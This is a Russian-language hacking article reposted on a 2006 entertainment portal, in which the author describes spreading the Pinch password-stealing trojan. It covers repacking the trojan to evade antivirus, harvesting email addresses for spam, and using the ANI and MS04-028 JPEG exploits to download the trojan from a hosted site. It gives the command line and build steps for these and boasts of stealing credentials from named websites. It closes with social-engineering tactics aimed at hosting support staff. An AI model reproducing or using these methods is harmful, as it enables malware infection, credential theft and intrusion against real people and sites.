Приёмы получения паролей с помощью новых эксплоитов. (HDoS) » Портал развлечении, soft, игры, фильмы, эротика, все для трубы, скрипты, железо, халява, статьй

Навигация:
    Главная
    Софт
    Игры
    НС - WP
    Фильмы
    Эротика
    Эротические историй
    Мобилка
    Скрипты
    Железо
    Халява
    Лента Статей
    Защита и Хак
    Программирование
    Windows
    Форум
    Главбух
    Магазин
    Игры
    Фото
    Диски
    WM-SHOP
    Обмен ссылками
Вход на сайт
Логин
Пароль
 
Регистрация на сайте
Забыли пароль?
Команда сайта:

ICQ status505-710
ICQ status180-974
Популярное:

Banners:

 
Друзья сайта:

  
  
 Приёмы получения паролей с помощью новых эксплоитов. (HDoS)
Приёмы получения паролей с помощью новых эксплоитов. (HDoS)


Я попытаюсь вам рассказать, как можно взламывать разум людей. А также как использовать удачно подвернувшуюся ситуацию.
Это одна из частей социальной психологии, направленная лишь на то, чтобы манипулировать людьми или порождать в их разум новую модель поведения.
многие не воспринимают её всерьёз, она является очень грозным оружием в руках хакера, имеющего хорошие технические навыки природное обаяние. )))
Меня всегда интересовали чужие пароли – поэтому в качестве оружия я выбрал пинча-
многофункционального трояна. Дающего кроме паролей кейлог и удаленный шелл. Я его слегка модернизировал – программами перекодировщиками- так чтоб хотя бы не обновленный антивирус не видел… потратив около часа возни с (dotfix, FSG 2.0, pe compact 2.0, UPX и программами для скрытия типа упаковщика и компилятора – stealth PE , hide PE) я добился в результате - каспер с февральскими базами молчал.

В наше жестокое время все сложнее становиться впаривать Трояны.
Да… люди уже не ведутся на бесплатные рассылки анекдотов и «крякеры интернета» (хотя по личному опыту скажу офисные работники и подростки запускают файлы с «анекдотами» - вот пример из 100 моих писем - пинч прислал порядка 11-12 паролей причем у этих людей вообще не было антивируса) так что не все так безнадежно. =)

Вот конкретный пример как искать таких людей: я искал их в Одиго- замечательном пейджере- суть вот в чем надо просматривать инфо пользователей и собирать спам лист из подобных мыльных ящиков ( little-cat@inbox.ru, kot-pes@mail.ru и т. д. ) и рассылать по ним пинча клеиного с txt файлом анекдотов– результат БУДЕТ это точно…

Так же в одиге много «типа-хацкеров» - их можно найти по инфо там такие интересы: (файрволы , творческая работа хакера , ip- tcp, администривование, assembler, C++ и т. д. ))
С одного такого мне удалось поиметь несколько 6 –знаков.
Да…. начинающие юзеры пренебрегают файрволами и антивирусами…и этим надо уметь пользоваться… просто нужно найти такого человека..
Сейчас актуальны следуюшие способы получения паролей с помощью пинча - они проще от жертвы требуется только кликнуть по нашей ссылке – не запуская никаких *.exe .


Эксплоиты.
1.*Ani exploit- собирается он так: скачиваем ani-spl.exe запускаем с параметрами (ani-spl.exe name http:\\somesite\troy.exe) в результате получаем два файла – name.html и name.ani - код из name.html вставляем в любую страничку..
Необходимо чтобы с name.html в одной папке был и name.ani- он и скачает на комп жертвы troy.exe
*недостатки: работает только с IE …
*не работает в SP2
+ абсолютно незаметен при запуске
+можно вставить его в сайт с нормальным содержанием.
+ AVP базы до 02.2005 не палит его
По-моему (имхо) лучший сплоит для IE на сегодняшний день.

2.*Еще один вариант «попросить скачать картинку» не многие знают что в Проводнике есть баг позволяющий запустить *.exe встроенный в картинку. Это иожно сделать при помощи сплоита переполнения буфера Windows JPEG GDI+ overflow (MS04-028) exploit и так скачиваем ms04exp.zip ….
1. подменяем hеllo.exe своим трояном.
2. Запускаем GENERATE.bat.
3. компилируем проект(CTRL+F9), должен появится файл jpg_gen.bin
4. переименовываем в jpg_gen.jpg
при его запуске сначала наблюдается зависание. ПРИЧЕМ не надо открывать картинку достадочно лишь навести курсор ... и Троян сделает свое черное дело.
*недостатки: не работает в SP 2
+ легко выдать за свою фотку…
+ появилось в базах AVP в 02.2005 т.е. необновленный каспер не спасёт.


3.* Для таких дел я рекомендую завести пару сайтов на бесплатных хостах я выбрал www.nm.ru – т. к. – менее подозрительное доменное имя получаеться…=)
(www.xxxxxx.nm.ru www.xxx12.nm.ru ) солидно даже ))))
Все это не сложно а результат не заставит себя ждать. Таким макаром я получил пароли от
www.barksistersburg.ru www.barkfuckers.ru www.mysalo.com (выходит админ нажал на мою ссылку) - и все пассы от ФТП, форума, админки, мыльников, аськи—стали моей собственностью…
Правда до этого мне пришлось провести огромную «пиар кампанию» по моим
«сайтам» - я по-флудил по куче разных форумах… спамил по аське и свершилось пророчество «ищущий да обрящет» )))

Суть в том что людям у которых слабый процессор и мало оперативной памяти (amd 700 и 128 mb) в лом юзать каспера ввиду его тормознутости…. И очень часто приходят солидные пароли от фтп, 6-ных асек, форумов.
+ многие мышинально шелкают по окошку файрвола когда он выдает сообщение что типа svchost.exe- лезет в сеть (сервер трояна лучше так и обозвать)

хорошо вот пример у админа www.barksistersburg.ru такая конфигурация компа…

OS: Windows XP
Memory: Total 1023 MB, Free 796 MB
Drive A (Removable)
Drive C (Fixed): Total 37471 MB, Free 32264 MB
Drive D (Fixed): Total 18228 MB, Free 15785 MB
Drive E (Fixed): Total 494 MB, Free 486 MB
Drive F (Fixed): Total 1019 MB, Free 879 MB
Drive G (CDROM)
Drive H (Fixed): Total 152580 MB, Free 91805 MB
Drive O (Unknown)
User Name: user
CPU Vendor: GenuineIntel
CPU Stepping: 1
CPU Model: 4
CPU Family: 15
CPU Type: Pentium IV
Host Name: localhost
Local IP: 127.0.0.1

А каспера нету обновленного…и файрвола нет…
Это смехота конечно….но таких в рунете более чем много….
Там работают солидные дядьки, но пинч уже больше месяца шлет мне логи и пароли…ОНИ и не думают о безопастности…админы - люди ленивые…

Заключение.
Отправляясь в путешествие по Сети, вы должны помнить, что на время соединения Вашего компьютера с Internet, он становится частью этой огромной сети и если вам доступны ресурсы миллионов компьютеров, то миллионы компьютеров могут иметь доступ к вашей машине. Вы не должны этого забывать. Информация сегодня - один из самых ценных товаров, который можно купить и продать. Поэтому всегда найдутся любители залезть в чужой компьютер.
Вот такой он рунет… нет это не ламерство просто многие впервые с подобным сталкиваются… и их пассы присылает заботливый пинч.
И самое главное нужен талант по убалтыванию людей втирание в доверие.
Чтобы полностью быть своим надо общаться несколько дней-недель
просто так давать ссылки незнакомым людям бесперспективная лажа…
Лучше выбрать конкретную жертву (к примеру тех. поддержку мелких и средних хостеров) разбалтывать и проверять под конец на наличие патчей и анивирусов
Просто там часто работают не далекие люди…и со всеми вытикающими для них последствиями. =)
Ну а пассы от хостера - наибольшая из удач…
Еще я хотел сказать что даже если сервак невозможно взломать обычным способом- то Социоинженерия – иногда единственное и эффективное оружие. Удачи…

Источник: www.pro-hack.org
Автор: MINDGROW
icq 877775

ОБСУДИТЬ НА ФОРУМЕ!

Уважаемый посетитель, Вы вошли на сайт, как незарегистрированный пользователь. Мы рекомендуем вам зарегистрироваться, либо войти на сайт под своим именем.

 (голосов: 0)
Panamka | 25 ноября 2006 | | Печать
 Добавление комментария
Ваше Имя:
Ваш E-Mail:
Смайлики:    smile wink wassat tongue laughing sad angry crying 


 

Код:

Включите эту картинку для отображения кода безопасности

Введите код

 


   
Полезное:

Счетчики:

 

Голосование:

Чего не хватает сайту ?
Игр
Софта
Статеи
Эротики
Мобилки
Фильмов
Скриптов
Панель кнопок:

 
Web 2.0 Online Dating Service with Dating Games: www.FirstClickFriend.com
Портал развлечении Каталог